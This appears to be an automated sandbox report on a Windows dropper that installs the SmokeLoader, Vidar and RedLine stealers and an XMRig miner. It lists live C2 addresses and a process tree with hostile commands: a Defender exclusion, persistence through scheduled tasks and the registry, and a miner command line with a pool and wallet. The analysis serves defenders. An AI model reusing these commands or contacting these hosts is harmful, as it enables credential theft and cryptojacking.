Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
07/09/2021, 17:26 UTC
210907-vzzaxsdae6 1007/09/2021, 13:18 UTC
210907-qkaa2acfe3 1006/09/2021, 17:52 UTC
210906-wfz9jsbch4 1006/09/2021, 17:51 UTC
210906-wfnwhsbch3 1006/09/2021, 13:27 UTC
210906-qp3hdaedaj 1006/09/2021, 09:28 UTC
210906-lfpgyaeael 1006/09/2021, 04:33 UTC
210906-e6mmpsaaa2 1005/09/2021, 05:25 UTC
210905-f4h26sfab6 1004/09/2021, 21:32 UTC
210904-1dqdsahfdj 1004/09/2021, 21:19 UTC
210904-z56z6shfck 10Analysis
-
max time kernel
767s -
max time network
1807s -
platform
windows7_x64 -
resource
win7-jp -
submitted
06/09/2021, 09:28 UTC
General
-
Target
setup_x86_x64_install.exe
-
Size
2.2MB
-
MD5
e3b3a95ef03de0de77cca7a54ea22c94
-
SHA1
d318d234f8f27f25de660d9881113df9d11c24ff
-
SHA256
baa381f572d293636b6e48cacd2cd6a6f4f9e5f71c583873260f6ac01f0f5e15
-
SHA512
3c1c6254f14491bc2cb096d8b46d0d65e096dac331bab2df9c5b173271eef1b9a9deb831f212a0117fab16665277208d0c1b5183ea600cc2bbe6f9049c57ad0d
Score
10/10
Malware Config
Extracted
Family
smokeloader
Version
2020
C2
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
rc4.i32
1
0x3b22e540
rc4.i32
1
0xa6b397e0
Extracted
Family
vidar
Version
40.4
Botnet
706
C2
https://romkaxarit.tumblr.com/
Attributes
-
profile_id
706
Extracted
Family
redline
Botnet
pub
C2
193.56.146.78:51487
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
-
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
-
XMRig Miner Payload 2 IoCs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 10 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 49 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 18 IoCs
-
Drops file in Windows directory 30 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 4 IoCs
-
Modifies Internet Explorer settings 1 TTPs 64 IoCs
-
Modifies data under HKEY_USERS 3 IoCs
-
Modifies registry class 24 IoCs
-
Modifies system certificate store 2 TTPs 10 IoCs
-
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 4 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 5 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 16 IoCs
-
Suspicious use of SendNotifyMessage 8 IoCs
-
Suspicious use of SetWindowsHookEx 20 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC075E194\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC075E194\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1544861ac3fe6a.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC075E194\Fri1544861ac3fe6a.exeFri1544861ac3fe6a.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 816 -s 9806⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri156ec98815f89c.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC075E194\Fri156ec98815f89c.exeFri156ec98815f89c.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri157e25afd971.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC075E194\Fri157e25afd971.exeFri157e25afd971.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-GNQ9H.tmp\Fri157e25afd971.tmp"C:\Users\Admin\AppData\Local\Temp\is-GNQ9H.tmp\Fri157e25afd971.tmp" /SL5="$60136,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC075E194\Fri157e25afd971.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-PSBCV.tmp\zab2our.exe"C:\Users\Admin\AppData\Local\Temp\is-PSBCV.tmp\zab2our.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies system certificate store
-
C:\Program Files\7-Zip\ZDMWSFRIJK\ultramediaburner.exe"C:\Program Files\7-Zip\ZDMWSFRIJK\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-L5T8I.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-L5T8I.tmp\ultramediaburner.tmp" /SL5="$1018E,281924,62464,C:\Program Files\7-Zip\ZDMWSFRIJK\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3c-1905c-9ca-612bc-d02351a8c8449\Dixexaboqo.exe"C:\Users\Admin\AppData\Local\Temp\3c-1905c-9ca-612bc-d02351a8c8449\Dixexaboqo.exe"8⤵
- Executes dropped EXE
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:892 CREDAT:275457 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:892 CREDAT:668690 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:892 CREDAT:472104 /prefetch:210⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:892 CREDAT:996387 /prefetch:210⤵
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:892 CREDAT:1848347 /prefetch:210⤵
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:892 CREDAT:3748901 /prefetch:210⤵
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18514839⤵
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18515139⤵
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=20872159⤵
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=42631199⤵
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=12942319⤵
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1492888&var=39⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\ca-34e6b-889-6cc8a-45d651df0bb93\Daecaetaezhagu.exe"C:\Users\Admin\AppData\Local\Temp\ca-34e6b-889-6cc8a-45d651df0bb93\Daecaetaezhagu.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4gkx4yjl.zxf\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\4gkx4yjl.zxf\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\4gkx4yjl.zxf\GcleanerEU.exe /eufive10⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\4gkx4yjl.zxf\GcleanerEU.exe" & exit11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f12⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cpdtm0ti.2q4\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\cpdtm0ti.2q4\installer.exeC:\Users\Admin\AppData\Local\Temp\cpdtm0ti.2q4\installer.exe /qn CAMPAIGN="654"10⤵
- Executes dropped EXE
- Enumerates connected drives
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\cpdtm0ti.2q4\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\cpdtm0ti.2q4\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630661036 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ciemurhb.rut\anyname.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\ciemurhb.rut\anyname.exeC:\Users\Admin\AppData\Local\Temp\ciemurhb.rut\anyname.exe10⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Users\Admin\AppData\Local\Temp\ciemurhb.rut\anyname.exe"C:\Users\Admin\AppData\Local\Temp\ciemurhb.rut\anyname.exe" -u11⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4us3ji1c.4tm\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\4us3ji1c.4tm\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\4us3ji1c.4tm\gcleaner.exe /mixfive10⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\4us3ji1c.4tm\gcleaner.exe" & exit11⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f12⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qf1jbhlg.zwf\autosubplayer.exe /S & exit9⤵
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri155442fc38b.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri15af75ee9b.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC075E194\Fri15af75ee9b.exeFri15af75ee9b.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c APPNAME7.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1553f0ee90.exe4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSC075E194\Fri1553f0ee90.exeFri1553f0ee90.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
- Executes dropped EXE
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1014320.exe"C:\Users\Admin\AppData\Roaming\1014320.exe"8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\8829410.exe"C:\Users\Admin\AppData\Roaming\8829410.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\5336633.exe"C:\Users\Admin\AppData\Roaming\5336633.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\3118703.exe"C:\Users\Admin\AppData\Roaming\3118703.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\6162411.exe"C:\Users\Admin\AppData\Roaming\6162411.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2636 -s 16609⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2160 -s 13928⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-0PQ4J.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-0PQ4J.tmp\setup_2.tmp" /SL5="$101CE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-1OO53.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-1OO53.tmp\setup_2.tmp" /SL5="$201E2,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-IK11D.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-IK11D.tmp\postback.exe" ss111⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss112⤵
-
C:\Users\Admin\AppData\Local\Temp\NtqD3mRSj.exe"C:\Users\Admin\AppData\Local\Temp\NtqD3mRSj.exe"13⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"14⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\15⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\16⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe" /F15⤵
- Creates scheduled task(s)
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "17530761661057899163-1556271516-75389361503825501-1596990364-1804259790-572515726"1⤵
- Executes dropped EXE
-
C:\Windows\system32\taskeng.exetaskeng.exe {C05A17F7-6BD3-4B3C-BA48-BA064D43EDCD} S-1-5-21-1669990088-476967504-438132596-1000:KJUCCLUP\Admin:Interactive:[1]1⤵
-
C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exeC:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\idawstcC:\Users\Admin\AppData\Roaming\idawstc2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Roaming\idawstcC:\Users\Admin\AppData\Roaming\idawstc2⤵
-
-
C:\Users\Admin\AppData\Roaming\idawstcC:\Users\Admin\AppData\Roaming\idawstc2⤵
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding ADF4A41876D491A4DFC412B2205737A9 C2⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 244EAF03385CD05437245EC0B681B7DC2⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 155129C7F122CEC1D7274385E175F326 M Global\MSI00002⤵
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {962102C5-A66C-4D2F-9A08-89B15F03DFA6} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 80802⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 80802⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 80802⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 80802⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 80802⤵
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 80802⤵
-
